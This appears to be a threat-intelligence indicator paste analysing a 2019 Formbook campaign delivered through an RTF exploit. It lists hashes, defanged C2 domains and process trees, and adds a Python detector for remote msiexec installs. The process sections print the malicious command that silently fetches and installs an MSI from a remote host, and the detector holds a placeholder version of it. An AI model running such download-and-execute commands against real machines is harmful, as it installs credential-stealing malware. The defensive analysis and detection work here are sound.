#formbook_070519

VRad, May 8th, 2019 (edited)
#IOC #OptiData #VR #formbook #RTF11882 #exe2msi #opendir

https://pastebin.com/H2mkW82S

previous_contact:
22/04/19    https://pastebin.com/1FMBBK3N
26/02/19    https://pastebin.com/yLu1cL9K
15/11/18    https://pastebin.com/VFG89LnT
14/11/18    https://pastebin.com/D6VPDyyz

FAQ:
http://www.exetomsi.com/freeware

attack_vector
--------------
email attach .doc (RTF) > 11882 > msiexec GET msi > install (broken)

email_headers
--------------
n/a

files
--------------
SHA-256     167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7
File name   PO-20190507.doc             [RTF]
File size   311.08 KB (318542 bytes)

SHA-256     1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999
File name   1.msi                       [MSI Installer, Exe to msi converter free]
File size   556 KB (569344 bytes)

SHA-256     f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397
File name   MSID06.tmp                  [PE32 executable (GUI) Intel 80386, for MS Windows]
File size   530.5 KB (543232 bytes)

activity
**************
PL_SCR  h11p:\ joeing2{.} duckdns{.} org/joe/1.msi

C2  h11p:\kvkhbw{.} com/jo/
    h11p:\7hprd{.} com/jo/
    h11p:\.atlanticpressftp{.} com/jo/
    h11p:\mohammadarif.info/jo/
    h11p:\tdoog{.} com/jo/
    h11p:\macounty{.} com/jo/
    h11p:\aufdemweg.one/jo/
    h11p:\interactivenetworksystems{.} com/jo/

cmd.exe & /C CD C: & msiexec.exe /i h11p:\ joeing2{.} duckdns{.} org/joe/1.msi /quiet

Error 1722. There is a problem with this Windows Installer package.
A program run as part of the setup did not finish as expected.
Contact your support personnel or package vendor.
Action _B3D13F97_1369_417D_A477_B4C42B829328, location: C:\Windows\Installer\MSI49E9.tmp, command: /S
=== Logging stopped: ??.??.2019  11:24:24 ===

netwrk
--------------
23.249.162.144  joeing2{.} duckdns{.} org   GET /joe/1.msi HTTP/1.1     Windows Installer

comp
--------------
msiexec.exe 3096    TCP localhost   50104   23.249.162.144  80  ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
... [not children, another context]
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
... [not children, another context]
C:\Windows\SysWOW64\cmd.exe & /C CD C: & msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
C:\Windows\SysWOW64\msiexec.exe /i http://joeing2{.} duckdns{.} org/joe/1.msi /quiet
... [not children, another context]
C:\Windows\system32\msiexec.exe
"C:\Windows\Installer\MSI49E9.tmp" /S

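As an added detection example (not part of the original paste), the following Python flags any process whose command line drives msiexec at a remote http(s) package, as in the proc section above, and reports whether the parent chain leads back to EQNEDT32.EXE or an Office host. The process records are constructed: "bad.example" is a placeholder domain, and the EQNEDT32.EXE to cmd.exe parent link is assumed (the paste shows them in separate contexts).

```python
import re
from pathlib import PureWindowsPath

# Constructed records modelled on the paste's "proc" section: (pid, parent_pid,
# image, cmdline). Sample data; "bad.example" is a placeholder, EQNEDT32->cmd assumed.
EVENTS = [
    (100, 1, r"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE",
     '"C:\\Program Files (x86)\\Microsoft Office\\Office12\\WINWORD.EXE" /n /dde'),
    (200, 1, r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     '"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE" -Embedding'),
    (300, 200, r"C:\Windows\SysWOW64\cmd.exe",
     "cmd.exe /C CD C: & msiexec.exe /i http://bad.example/joe/1.msi /quiet"),
    (400, 300, r"C:\Windows\SysWOW64\msiexec.exe",
     "msiexec.exe /i http://bad.example/joe/1.msi /quiet"),
    # Benign control: an admin shell installing a local package must not fire.
    (500, 1, r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i C:\Temp\vendor-tool.msi /qn"),
]

# msiexec with /i or /package pointing at an http(s) URL, anywhere in the cmdline
# (so the cmd.exe wrapper is caught even if the child msiexec event is missing).
MSI_REMOTE = re.compile(
    r'msiexec(?:\.exe)?\b.*?[/-](?:i|package)\s+"?(https?://[^\s"]+)', re.IGNORECASE)
QUIET_ARG = re.compile(r"(?:^|\s)/(?:quiet|qn|qb)\b", re.IGNORECASE)
SUSPECT_ANCESTORS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

def image_name(path):
    return PureWindowsPath(path).name.lower()

def ancestors(pid, by_pid):
    # Image names up the parent chain, nearest first (bounded against pid-reuse loops).
    chain = []
    while pid in by_pid and len(chain) < 32:
        pid = by_pid[pid][1]
        if pid in by_pid:
            chain.append(image_name(by_pid[pid][2]))
    return chain

def find_remote_msiexec(events):
    by_pid = {e[0]: e for e in events}
    hits = []
    for pid, _ppid, _image, cmdline in events:
        m = MSI_REMOTE.search(cmdline)
        if not m:
            continue
        chain = ancestors(pid, by_pid)
        hits.append({"pid": pid, "url": m.group(1), "ancestors": chain,
                     "quiet": bool(QUIET_ARG.search(cmdline)),
                     "office_origin": any(n in SUSPECT_ANCESTORS for n in chain)})
    return hits
```

Run against real process-creation telemetry (Sysmon event 1 or 4688 with command-line auditing), the same two regexes translate directly into a SIEM rule; the ancestor check is what separates this chain from a legitimate remote-package install.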
persist
--------------
n/a

drop
--------------
C:\Windows\Installer\MSI49E9.tmp
%temp%\MSI6769f.LOG

# # #
https://www.virustotal.com/gui/file/167441aa99bbbe621a775528f8c20724c6091e65d80fdf700389f0c9af41ead7/details
https://www.virustotal.com/gui/file/1c9fe57b3adaa58d86bcc8f683d6496c1ce40ee468434d768543910e8442f999/details
https://www.virustotal.com/gui/file/f6c6bed0e6a223f26de874256e0ce8443a6203634aa2d2871c0cbec73adcb397/details
https://analyze.intezer.com/#/analyses/33fac682-f65f-4ecd-82c5-1abf759a07a7
https://analyze.intezer.com/#/analyses/5b072d73-73f0-404a-ac75-3141ed972a9e
https://www.virustotal.com/gui/file/e22634d0f10eb26fe0503478c8027a0eabe734006e664014ada5e09a58097e91/details
https://analyze.intezer.com/#/analyses/2aaf18fe-3d54-4ca9-a002-32cad1f3f985

VR